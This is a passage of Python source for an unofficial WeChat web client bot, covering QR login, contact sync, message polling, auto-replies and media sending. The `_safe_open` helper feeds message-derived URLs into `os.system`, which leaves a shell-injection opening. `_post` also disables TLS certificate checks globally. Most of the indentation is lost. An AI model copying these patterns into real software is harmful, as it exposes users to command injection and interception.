def loadConfig(self, config):
if config['DEBUG']:
self.DEBUG = config['DEBUG']
if config['autoReplyMode']:
self.autoReplyMode = config['autoReplyMode']
if config['user_agent']:
self.user_agent = config['user_agent']
if config['interactive']:
self.interactive = config['interactive']
if config['autoOpen']:
self.autoOpen = config['autoOpen']
def getUUID(self):
url = 'https://login.weixin.qq.com/jslogin'
params = {
'appid': self.appid,
'fun': 'new',
'lang': self.lang,
'_': int(time.time()),
}
#r = requests.get(url=url, params=params)
#r.encoding = 'utf-8'
#data = r.text
        data = self._post(url, params, False)
        if data == '':
            return False
        data = data.decode("utf-8")
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
pm = re.search(regx, data)
if pm:
code = pm.group(1)
self.uuid = pm.group(2)
return code == '200'
return False
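    # Hedged example of the jslogin response getUUID() parses (the uuid value
    # is made up; the real payload comes from the WeChat login servers):
    #   window.QRLogin.code = 200; window.QRLogin.uuid = "QbQBW1Np_g==";
    # The uuid is stored on self and the method returns True only for code 200.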
def genQRCode(self):
#return self._showQRCodeImg()
if sys.platform.startswith('win'):
self._showQRCodeImg('win')
elif sys.platform.find('darwin') >= 0:
self._showQRCodeImg('macos')
else:
self._str2qr('https://login.weixin.qq.com/l/' + self.uuid)
def _showQRCodeImg(self, str):
if self.commandLineQRCode:
qrCode = QRCode('https://login.weixin.qq.com/l/' + self.uuid)
self._showCommandLineQRCode(qrCode.text(1))
else:
url = 'https://login.weixin.qq.com/qrcode/' + self.uuid
params = {
't': 'webwx',
'_': int(time.time())
}
data = self._post(url, params, False)
if data == '':
return
QRCODE_PATH = self._saveFile('qrcode.jpg', data, '_showQRCodeImg')
if str == 'win':
os.startfile(QRCODE_PATH)
elif str == 'macos':
subprocess.call(["open", QRCODE_PATH])
else:
return
def _showCommandLineQRCode(self, qr_data, enableCmdQR=2):
try:
b = u'\u2588'
sys.stdout.write(b + '\r')
sys.stdout.flush()
except UnicodeEncodeError:
white = 'MM'
else:
white = b
black = ' '
blockCount = int(enableCmdQR)
if abs(blockCount) == 0:
blockCount = 1
white *= abs(blockCount)
if blockCount < 0:
white, black = black, white
sys.stdout.write(' ' * 50 + '\r')
sys.stdout.flush()
qr = qr_data.replace('0', white).replace('1', black)
sys.stdout.write(qr)
sys.stdout.flush()
def waitForLogin(self, tip=1):
time.sleep(tip)
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % (
tip, self.uuid, int(time.time()))
data = self._get(url)
if data == '':
return False
pm = re.search(r"window.code=(\d+);", data)
code = pm.group(1)
if code == '201':
return True
elif code == '200':
pm = re.search(r'window.redirect_uri="(\S+?)";', data)
r_uri = pm.group(1) + '&fun=new'
self.redirect_uri = r_uri
self.base_uri = r_uri[:r_uri.rfind('/')]
return True
elif code == '408':
self._echo('[登陆超时] \n')
else:
self._echo('[登陆异常] \n')
return False
def login(self):
data = self._get(self.redirect_uri)
if data == '':
return False
doc = xml.dom.minidom.parseString(data)
root = doc.documentElement
for node in root.childNodes:
if node.nodeName == 'skey':
self.skey = node.childNodes[0].data
elif node.nodeName == 'wxsid':
self.sid = node.childNodes[0].data
elif node.nodeName == 'wxuin':
self.uin = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
self.pass_ticket = node.childNodes[0].data
if '' in (self.skey, self.sid, self.uin, self.pass_ticket):
return False
self.BaseRequest = {
'Uin': int(self.uin),
'Sid': self.sid,
'Skey': self.skey,
'DeviceID': self.deviceId,
}
return True
def webwxinit(self):
url = self.base_uri + '/webwxinit?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
params = {
'BaseRequest': self.BaseRequest
}
dic = self._post(url, params)
if dic == '':
return False
self.SyncKey = dic['SyncKey']
self.User = dic['User']
# synckey for synccheck
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic['BaseResponse']['Ret'] == 0
def webwxstatusnotify(self):
url = self.base_uri + \
'/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Code": 3,
"FromUserName": self.User['UserName'],
"ToUserName": self.User['UserName'],
"ClientMsgId": int(time.time())
}
dic = self._post(url, params)
if dic == '':
return False
return dic['BaseResponse']['Ret'] == 0
def webwxgetcontact(self):
SpecialUsers = self.SpecialUsers
url = self.base_uri + '/webwxgetcontact?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
dic = self._post(url, {})
if dic == '':
return False
self.MemberCount = dic['MemberCount']
self.MemberList = dic['MemberList']
ContactList = self.MemberList[:]
GroupList = self.GroupList[:]
PublicUsersList = self.PublicUsersList[:]
SpecialUsersList = self.SpecialUsersList[:]
for i in range(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
            if Contact['VerifyFlag'] & 8 != 0:  # official/service account
                ContactList.remove(Contact)
                self.PublicUsersList.append(Contact)
            elif Contact['UserName'] in SpecialUsers:  # special account
                ContactList.remove(Contact)
                self.SpecialUsersList.append(Contact)
            elif '@@' in Contact['UserName']:  # group chat
                ContactList.remove(Contact)
                self.GroupList.append(Contact)
            elif Contact['UserName'] == self.User['UserName']:  # self
ContactList.remove(Contact)
self.ContactList = ContactList
return True
def webwxbatchgetcontact(self):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": len(self.GroupList),
"List": [{"UserName": g['UserName'], "EncryChatRoomId":""} for g in self.GroupList]
}
dic = self._post(url, params)
if dic == '':
return False
# blabla ...
ContactList = dic['ContactList']
ContactCount = dic['Count']
self.GroupList = ContactList
for i in range(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
MemberList = Contact['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return True
def getNameById(self, id):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": 1,
"List": [{"UserName": id, "EncryChatRoomId": ""}]
}
dic = self._post(url, params)
if dic == '':
return None
# blabla ...
return dic['ContactList']
def testsynccheck(self):
SyncHost = ['wx2.qq.com',
'webpush.wx2.qq.com',
'wx8.qq.com',
'webpush.wx8.qq.com',
'qq.com',
'webpush.wx.qq.com',
'web2.wechat.com',
'webpush.web2.wechat.com',
'wechat.com',
'webpush.web.wechat.com',
'webpush.weixin.qq.com',
'webpush.wechat.com',
'webpush1.wechat.com',
'webpush2.wechat.com',
'webpush.wx.qq.com',
'webpush2.wx.qq.com']
for host in SyncHost:
self.syncHost = host
[retcode, selector] = self.synccheck()
if retcode == '0':
return True
return False
def synccheck(self):
params = {
'r': int(time.time()),
'sid': self.sid,
'uin': self.uin,
'skey': self.skey,
'deviceid': self.deviceId,
'synckey': self.synckey,
'_': int(time.time()),
}
url = 'https://' + self.syncHost + '/cgi-bin/mmwebwx-bin/synccheck?' + urllib.parse.urlencode(params)
data = self._get(url, timeout=5)
if data == '':
return [-1,-1]
pm = re.search(
r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}', data)
retcode = pm.group(1)
selector = pm.group(2)
return [retcode, selector]
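    # Summary of the synccheck result as interpreted by listenMsgMode() below:
    # retcode '0' means the session is alive, '1100' that the user logged out
    # on the phone, '1101' that web WeChat was opened elsewhere; selector '2'
    # signals new messages, '7' phone-side activity and '0' nothing to fetch.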
def webwxsync(self):
url = self.base_uri + \
'/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.sid, self.skey, self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
'SyncKey': self.SyncKey,
'rr': ~int(time.time())
}
dic = self._post(url, params)
if dic == '':
return None
if self.DEBUG:
print(json.dumps(dic, indent=4))
            logging.debug(json.dumps(dic, indent=4))
if dic['BaseResponse']['Ret'] == 0:
self.SyncKey = dic['SyncKey']
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic
def webwxsendmsg(self, word, to='filehelper'):
url = self.base_uri + \
'/webwxsendmsg?pass_ticket=%s' % (self.pass_ticket)
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
params = {
'BaseRequest': self.BaseRequest,
'Msg': {
"Type": 1,
"Content": self._transcoding(word),
"FromUserName": self.User['UserName'],
"ToUserName": to,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(params, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxuploadmedia(self, image_name):
url = 'https://file2.wx.qq.com/cgi-bin/mmwebwx-bin/webwxuploadmedia?f=json'
        # upload counter
        self.media_count = self.media_count + 1
        # file name
        file_name = image_name
        # MIME type
        # mime_type = application/pdf, image/jpeg, image/png, etc.
        mime_type = mimetypes.guess_type(image_name, strict=False)[0]
        # Document type as recognised by WeChat; the server appears to support
        # only two kinds: 'pic' (shown inline) and 'doc' (shown as a file).
        media_type = 'pic' if mime_type.split('/')[0] == 'image' else 'doc'
        # last modified date
        lastModifieDate = 'Thu Mar 17 2016 00:55:10 GMT+0800 (CST)'
        # file size
file_size = os.path.getsize(file_name)
# PassTicket
pass_ticket = self.pass_ticket
# clientMediaId
client_media_id = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
# webwx_data_ticket
webwx_data_ticket = ''
for item in self.cookie:
if item.name == 'webwx_data_ticket':
webwx_data_ticket = item.value
break
        if webwx_data_ticket == '':
            # No webwx_data_ticket cookie: the upload cannot succeed.
            return None
uploadmediarequest = json.dumps({
"BaseRequest": self.BaseRequest,
"ClientMediaId": client_media_id,
"TotalLen": file_size,
"StartPos": 0,
"DataLen": file_size,
"MediaType": 4
}, ensure_ascii=False).encode('utf8')
multipart_encoder = MultipartEncoder(
fields={
'id': 'WU_FILE_' + str(self.media_count),
'name': file_name,
'type': mime_type,
'lastModifieDate': lastModifieDate,
'size': str(file_size),
'mediatype': media_type,
'uploadmediarequest': uploadmediarequest,
'webwx_data_ticket': webwx_data_ticket,
'pass_ticket': pass_ticket,
'filename': (file_name, open(file_name, 'rb'), mime_type.split('/')[1])
},
boundary='-----------------------------1575017231431605357584454111'
)
headers = {
'Host': 'file2.wx.qq.com',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'https://wx2.qq.com/',
'Content-Type': multipart_encoder.content_type,
'Origin': 'https://wx2.qq.com',
'Connection': 'keep-alive',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
r = requests.post(url, data=multipart_encoder, headers=headers)
response_json = r.json()
if response_json['BaseResponse']['Ret'] == 0:
return response_json
return None
def webwxsendmsgimg(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendmsgimg?fun=async&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 3,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxsendmsgemotion(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendemoticon?fun=sys&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 47,
"EmojiFlag": 2,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
if self.DEBUG:
print(json.dumps(dic, indent=4))
logging.debug(json.dumps(dic, indent=4))
return dic['BaseResponse']['Ret'] == 0
def _saveFile(self, filename, data, api=None):
fn = filename
if self.saveSubFolders[api]:
dirName = os.path.join(self.saveFolder, self.saveSubFolders[api])
if not os.path.exists(dirName):
os.makedirs(dirName)
fn = os.path.join(dirName, filename)
logging.debug('Saved file: %s' % fn)
with open(fn, 'wb') as f:
f.write(data)
f.close()
return fn
def webwxgeticon(self, id):
url = self.base_uri + \
'/webwxgeticon?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgeticon')
def webwxgetheadimg(self, id):
url = self.base_uri + \
'/webwxgetheadimg?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgetheadimg')
def webwxgetmsgimg(self, msgid):
url = self.base_uri + \
'/webwxgetmsgimg?MsgID=%s&skey=%s' % (msgid, self.skey)
logging.info("webwxgetmsgimg url :" + url)
data = self._get(url,"webwxgetmsgimg")
if data == '':
return ''
fn = 'img_' + msgid + '.jpg'
return self._saveFile(fn, data, 'webwxgetmsgimg')
# Not work now for weixin haven't support this API
def webwxgetvideo(self, msgid):
url = self.base_uri + \
'/webwxgetvideo?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url, api='webwxgetvideo')
if data == '':
return ''
fn = 'video_' + msgid + '.mp4'
return self._saveFile(fn, data, 'webwxgetvideo')
def webwxgetvoice(self, msgid):
url = self.base_uri + \
'/webwxgetvoice?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url, api='webwxgetvoice')
if data == '':
return ''
fn = 'voice_' + msgid + '.mp3'
return self._saveFile(fn, data, 'webwxgetvoice')
def getGroupName(self, id):
name = '未知群'
for member in self.GroupList:
if member['UserName'] == id:
name = member['NickName']
if name == '未知群':
            # not found among the groups we already know about
GroupList = self.getNameById(id)
for group in GroupList:
self.GroupList.append(group)
if group['UserName'] == id:
name = group['NickName']
MemberList = group['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return name
def getUserRemarkName(self, id):
name = '未知群' if id[:2] == '@@' else '陌生人'
if id == self.User['UserName']:
            return self.User['NickName']  # self
if id[:2] == '@@':
            # group chat
name = self.getGroupName(id)
else:
            # special accounts
for member in self.SpecialUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
            # official or service accounts
for member in self.PublicUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
            # direct contacts
for member in self.ContactList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
            # group members
for member in self.GroupMemeberList:
if member['UserName'] == id:
name = member['DisplayName'] if member[
'DisplayName'] else member['NickName']
if name == '未知群' or name == '陌生人':
logging.debug(id)
return name
def getUSerID(self, name):
for member in self.MemberList:
if name == member['RemarkName'] or name == member['NickName']:
return member['UserName']
return None
def _showMsg(self, message):
srcName = None
dstName = None
groupName = None
content = None
msg = message
logging.debug(msg)
if msg['raw_msg']:
srcName = self.getUserRemarkName(msg['raw_msg']['FromUserName'])
dstName = self.getUserRemarkName(msg['raw_msg']['ToUserName'])
            content = msg['raw_msg']['Content'].replace(
                '&lt;', '<').replace('&gt;', '>')
message_id = msg['raw_msg']['MsgId']
if content.find('http://weixin.qq.com/cgi-bin/redirectforward?args=') != -1:
                # location message
                data = self._get(content)
                if data == '':
                    return
                pos = self._searchContent('title', data, 'xml')
temp = self._get(content)
if temp == '':
return
tree = html.fromstring(temp)
url = tree.xpath('//html/body/div/img')[0].attrib['src']
for item in urlparse(url).query.split('&'):
if item.split('=')[0] == 'center':
loc = item.split('=')[-1:]
content = '%s 发送了一个 位置消息 - 我在 [%s](%s) @ %s]' % (
srcName, pos, url, loc)
if msg['raw_msg']['ToUserName'] == 'filehelper':
                # file transfer helper (filehelper)
dstName = '文件传输助手'
if msg['raw_msg']['FromUserName'][:2] == '@@':
                # message received from a group chat
if ":<br/>" in content:
[people, content] = content.split(':<br/>', 1)
groupName = srcName
srcName = self.getUserRemarkName(people)
dstName = 'GROUP'
else:
groupName = srcName
srcName = 'SYSTEM'
elif msg['raw_msg']['ToUserName'][:2] == '@@':
                # message sent by ourselves to a group chat
groupName = dstName
dstName = 'GROUP'
            # received a red envelope
if content == '收到红包,请在手机上查看':
msg['message'] = content
            # the message content was set explicitly above
if 'message' in list(msg.keys()):
content = msg['message']
if groupName != None:
print('%s |%s| %s -> %s: %s' % (message_id, groupName.strip(), srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
logging.info('%s |%s| %s -> %s: %s' % (message_id, groupName.strip(),
srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
else:
print('%s %s -> %s: %s' % (message_id, srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
logging.info('%s %s -> %s: %s' % (message_id, srcName.strip(),
dstName.strip(), content.replace('<br/>', '\n')))
def handleMsg(self, r):
for msg in r['AddMsgList']:
print('[*] 你有新的消息,请注意查收')
logging.debug('[*] 你有新的消息,请注意查收')
if self.DEBUG:
fn = 'msg' + str(int(random.random() * 1000)) + '.json'
with open(fn, 'w') as f:
f.write(json.dumps(msg))
print('[*] 该消息已储存到文件: ' + fn)
logging.debug('[*] 该消息已储存到文件: %s' % (fn))
msgType = msg['MsgType']
name = self.getUserRemarkName(msg['FromUserName'])
            content = msg['Content'].replace('&lt;', '<').replace('&gt;', '>')
msgid = msg['MsgId']
if msgType == 1:
raw_msg = {'raw_msg': msg}
self._showMsg(raw_msg)
if self.autoReplyMode:
ans = autoReply(content)+ ' -- [微信机器人自动回复]'
logging.info("autoreply " + ans)
if self.webwxsendmsg(ans, msg['FromUserName']):
print('自动回复: ' + ans)
logging.info('自动回复: ' + ans)
else:
print('自动回复失败')
logging.info('自动回复失败')
elif msgType == 3:
image = self.webwxgetmsgimg(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发送了一张图片: %s' % (name, image)}
self._showMsg(raw_msg)
self._safe_open(image)
elif msgType == 34:
voice = self.webwxgetvoice(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段语音: %s' % (name, voice)}
self._showMsg(raw_msg)
self._safe_open(voice)
elif msgType == 42:
info = msg['RecommendInfo']
print('%s 发送了一张名片:' % name)
print('=========================')
print('= 昵称: %s' % info['NickName'])
print('= 微信号: %s' % info['Alias'])
print('= 地区: %s %s' % (info['Province'], info['City']))
print('= 性别: %s' % ['未知', '男', '女'][info['Sex']])
print('=========================')
raw_msg = {'raw_msg': msg, 'message': '%s 发送了一张名片: %s' % (
name.strip(), json.dumps(info))}
self._showMsg(raw_msg)
elif msgType == 47:
url = self._searchContent('cdnurl', content)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一个动画表情,点击下面链接查看: %s' % (name, url)}
self._showMsg(raw_msg)
self._safe_open(url)
elif msgType == 49:
appMsgType = defaultdict(lambda: "")
appMsgType.update({5: '链接', 3: '音乐', 7: '微博'})
print('%s 分享了一个%s:' % (name, appMsgType[msg['AppMsgType']]))
print('=========================')
print('= 标题: %s' % msg['FileName'])
print('= 描述: %s' % self._searchContent('des', content, 'xml'))
print('= 链接: %s' % msg['Url'])
print('= 来自: %s' % self._searchContent('appname', content, 'xml'))
print('=========================')
card = {
'title': msg['FileName'],
'description': self._searchContent('des', content, 'xml'),
'url': msg['Url'],
'appname': self._searchContent('appname', content, 'xml')
}
raw_msg = {'raw_msg': msg, 'message': '%s 分享了一个%s: %s' % (
name, appMsgType[msg['AppMsgType']], json.dumps(card))}
self._showMsg(raw_msg)
elif msgType == 51:
raw_msg = {'raw_msg': msg, 'message': '[*] 成功获取联系人信息'}
self._showMsg(raw_msg)
elif msgType == 62:
video = self.webwxgetvideo(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段小视频: %s' % (name, video)}
self._showMsg(raw_msg)
self._safe_open(video)
elif msgType == 10002:
raw_msg = {'raw_msg': msg, 'message': '%s 撤回了一条消息' % name}
self._showMsg(raw_msg)
else:
logging.debug('[*] 该消息类型为: %d,可能是表情,图片, 链接或红包: %s' %
(msg['MsgType'], json.dumps(msg)))
raw_msg = {
'raw_msg': msg, 'message': '[*] 该消息类型为: %d,可能是表情,图片, 链接或红包' % msg['MsgType']}
self._showMsg(raw_msg)
def listenMsgMode(self):
print('[*] 进入消息监听模式 ... 成功')
logging.debug('[*] 进入消息监听模式 ... 成功')
self._run('[*] 进行同步线路测试 ... ', self.testsynccheck)
playWeChat = 0
redEnvelope = 0
while True:
self.lastCheckTs = time.time()
[retcode, selector] = self.synccheck()
# if self.DEBUG:
# print('retcode: %s, selector: %s' % (retcode, selector))
# logging.debug('retcode: %s, selector: %s' % (retcode, selector))
if retcode == '1100':
print('[*] 你在手机上登出了微信,债见')
logging.debug('[*] 你在手机上登出了微信,债见')
break
if retcode == '1101':
print('[*] 你在其他地方登录了 WEB 版微信,债见')
logging.debug('[*] 你在其他地方登录了 WEB 版微信,债见')
break
elif retcode == '0':
if selector == '2':
r = self.webwxsync()
if r is not None:
self.handleMsg(r)
# elif selector == '3':
# r = self.webwxsync()
# if r is not None:
# self.handleMsg(r)
elif selector == '6':
# TODO
redEnvelope += 1
print('[*] 收到疑似红包消息 %d 次' % redEnvelope)
logging.debug('[*] 收到疑似红包消息 %d 次' % redEnvelope)
elif selector == '7':
playWeChat += 1
print('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
logging.debug('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
r = self.webwxsync()
elif selector == '0':
time.sleep(1)
if (time.time() - self.lastCheckTs) <= 20:
time.sleep(time.time() - self.lastCheckTs)
def sendMsg(self, name, word, isfile=False):
id = self.getUSerID(name)
if id:
if isfile:
with open(word, 'r') as f:
for line in f.readlines():
line = line.replace('\n', '')
self._echo('-> ' + name + ': ' + line)
if self.webwxsendmsg(line, id):
print(' [成功]')
else:
print(' [失败]')
time.sleep(1)
else:
if self.webwxsendmsg(word, id):
print('[*] 消息发送成功')
logging.debug('[*] 消息发送成功')
else:
print('[*] 消息发送失败')
logging.debug('[*] 消息发送失败')
else:
print('[*] 此用户不存在')
logging.debug('[*] 此用户不存在')
def sendMsgToAll(self, word):
for contact in self.ContactList:
name = contact['RemarkName'] if contact[
'RemarkName'] else contact['NickName']
id = contact['UserName']
self._echo('-> ' + name + ': ' + word)
if self.webwxsendmsg(word, id):
print(' [成功]')
else:
print(' [失败]')
time.sleep(1)
def sendImg(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgimg(user_id, media_id)
def sendEmotion(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgemotion(user_id, media_id)
@catchKeyboardInterrupt
def start(self):
self._echo('[*] 微信网页版 ... 开动')
print()
logging.debug('[*] 微信网页版 ... 开动')
while True:
self._run('[*] 正在获取 uuid ... ', self.getUUID)
self._echo('[*] 正在获取二维码 ... 成功')
print()
logging.debug('[*] 微信网页版 ... 开动')
self.genQRCode()
print('[*] 请使用微信扫描二维码以登录 ... ')
if not self.waitForLogin():
continue
print('[*] 请在手机上点击确认以登录 ... ')
if not self.waitForLogin(0):
continue
break
self._run('[*] 正在登录 ... ', self.login)
self._run('[*] 微信初始化 ... ', self.webwxinit)
self._run('[*] 开启状态通知 ... ', self.webwxstatusnotify)
self._run('[*] 获取联系人 ... ', self.webwxgetcontact)
self._echo('[*] 应有 %s 个联系人,读取到联系人 %d 个' %
(self.MemberCount, len(self.MemberList)))
print()
self._echo('[*] 共有 %d 个群 | %d 个直接联系人 | %d 个特殊账号 | %d 公众号或服务号' % (len(self.GroupList),
len(self.ContactList), len(self.SpecialUsersList), len(self.PublicUsersList)))
print()
self._run('[*] 获取群 ... ', self.webwxbatchgetcontact)
logging.debug('[*] 微信网页版 ... 开动')
# if self.DEBUG:
# print(self)
# logging.debug(self)
if self.interactive and input('[*] 是否开启自动回复模式(y/n): ') == 'y':
self.autoReplyMode = True
print('[*] 自动回复模式 ... 开启')
logging.debug('[*] 自动回复模式 ... 开启')
else:
print('[*] 自动回复模式 ... 关闭')
logging.debug('[*] 自动回复模式 ... 关闭')
if sys.platform.startswith('win'):
import _thread
            _thread.start_new_thread(self.listenMsgMode, ())
else:
listenProcess = multiprocessing.Process(target=self.listenMsgMode)
listenProcess.start()
while True:
text = input('')
if text == 'quit':
listenProcess.terminate()
print('[*] 退出微信')
logging.debug('[*] 退出微信')
exit()
elif text[:2] == '->':
[name, word] = text[2:].split(':')
if name == 'all':
self.sendMsgToAll(word)
else:
self.sendMsg(name, word)
elif text[:3] == 'm->':
[name, file] = text[3:].split(':')
self.sendMsg(name, file, True)
elif text[:3] == 'f->':
print('发送文件')
logging.debug('发送文件')
elif text[:3] == 'i->':
print('发送图片')
[name, file_name] = text[3:].split(':')
self.sendImg(name, file_name)
logging.debug('发送图片')
elif text[:3] == 'e->':
print('发送表情')
[name, file_name] = text[3:].split(':')
self.sendEmotion(name, file_name)
logging.debug('发送表情')
def _safe_open(self, path):
if self.autoOpen:
if platform.system() == "Linux":
os.system("xdg-open %s &" % path)
else:
os.system('open %s &' % path)
def _run(self, str, func, *args):
self._echo(str)
if func(*args):
print('成功')
logging.debug('%s... 成功' % (str))
else:
print('失败\n[*] 退出程序')
logging.debug('%s... 失败' % (str))
logging.debug('[*] 退出程序')
exit()
def _echo(self, str):
sys.stdout.write(str)
sys.stdout.flush()
def _printQR(self, mat):
for i in mat:
BLACK = '\033[40m \033[0m'
WHITE = '\033[47m \033[0m'
print(''.join([BLACK if j else WHITE for j in i]))
def _str2qr(self, str):
print(str)
qr = qrcode.QRCode()
qr.border = 1
qr.add_data(str)
qr.make()
# img = qr.make_image()
# img.save("qrcode.png")
#mat = qr.get_matrix()
#self._printQR(mat) # qr.print_tty() or qr.print_ascii()
qr.print_ascii(invert=True)
def _transcoding(self, data):
if not data:
return data
result = None
        if isinstance(data, str):
            result = data
        elif isinstance(data, bytes):
            result = data.decode('utf-8')
return result
    def _get(self, url, api=None, timeout=None):
request = urllib.request.Request(url=url)
request.add_header('Referer', 'https://wx.qq.com/')
if api == 'webwxgetvoice':
request.add_header('Range', 'bytes=0-')
if api == 'webwxgetvideo':
request.add_header('Range', 'bytes=0-')
if api == 'webwxgetmsgimg':
request.add_header('Range', 'bytes=0-')
try:
            # seen in recent testing: image responses cannot be utf-8 decoded
response = urllib.request.urlopen(request, timeout=timeout) if timeout else urllib.request.urlopen(request)
if api == 'webwxgetvoice' or api == 'webwxgetvideo' or api == 'webwxgetmsgimg':
data = response.read()
else:
data = response.read().decode('utf-8')
# logging.debug(url)
return data
except urllib.error.HTTPError as e:
logging.error('HTTPError = ' + str(e.code))
except urllib.error.URLError as e:
logging.error('URLError = ' + str(e.reason))
except http.client.HTTPException as e:
logging.error('HTTPException')
except timeout_error as e:
pass
except ssl.CertificateError as e:
pass
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
return ''
    def _post(self, url, params, jsonfmt=True):
        # local certificate verification fails, so disable certificate checks
ssl._create_default_https_context = ssl._create_unverified_context
if jsonfmt:
data = (json.dumps(params)).encode()
request = urllib.request.Request(url=url, data=data)
request.add_header(
'ContentType', 'application/json; charset=UTF-8')
else:
request = urllib.request.Request(url=url, data=urllib.parse.urlencode(params).encode(encoding='utf-8'))
try:
response = urllib.request.urlopen(request)
data = response.read()
if jsonfmt:
                return json.loads(data.decode('utf-8'))  # object_hook=_decode_dict
return data
except urllib.error.HTTPError as e:
logging.error('HTTPError = ' + str(e.code))
except urllib.error.URLError as e:
logging.error('URLError = ' + str(e.reason))
except http.client.HTTPException as e:
logging.error('HTTPException')
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
return ''
def _xiaodoubi(self, word):
url = 'http://www.xiaodoubi.com/bot/chat.php'
try:
r = requests.post(url, data={'chat': word})
return r.content
except:
return "让我一个人静静 T_T..."
def _simsimi(self, word):
key = ''
url = 'http://sandbox.api.simsimi.com/request.p?key=%s&lc=ch&ft=0.0&text=%s' % (
key, word)
r = requests.get(url)
ans = r.json()
if ans['result'] == '100':
return ans['response']
else:
return '你在说什么,风太大听不清列'
def _searchContent(self, key, content, fmat='attr'):
if fmat == 'attr':
            pm = re.search(key + r'\s?=\s?"([^"<]+)"', content)
if pm:
return pm.group(1)
elif fmat == 'xml':
pm = re.search('<{0}>([^<]+)</{0}>'.format(key), content)
if not pm:
                pm = re.search(
                    r'<{0}><!\[CDATA\[(.*?)\]\]></{0}>'.format(key), content)
if pm:
return pm.group(1)
return '未知'
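    # Hedged usage sketch for _searchContent (inputs are made-up examples):
    #   self._searchContent('cdnurl', 'cdnurl = "http://example.com/a.gif"')
    #       -> 'http://example.com/a.gif'   (fmat='attr', the default)
    #   self._searchContent('des', '<des>hello</des>', 'xml')
    #       -> 'hello'
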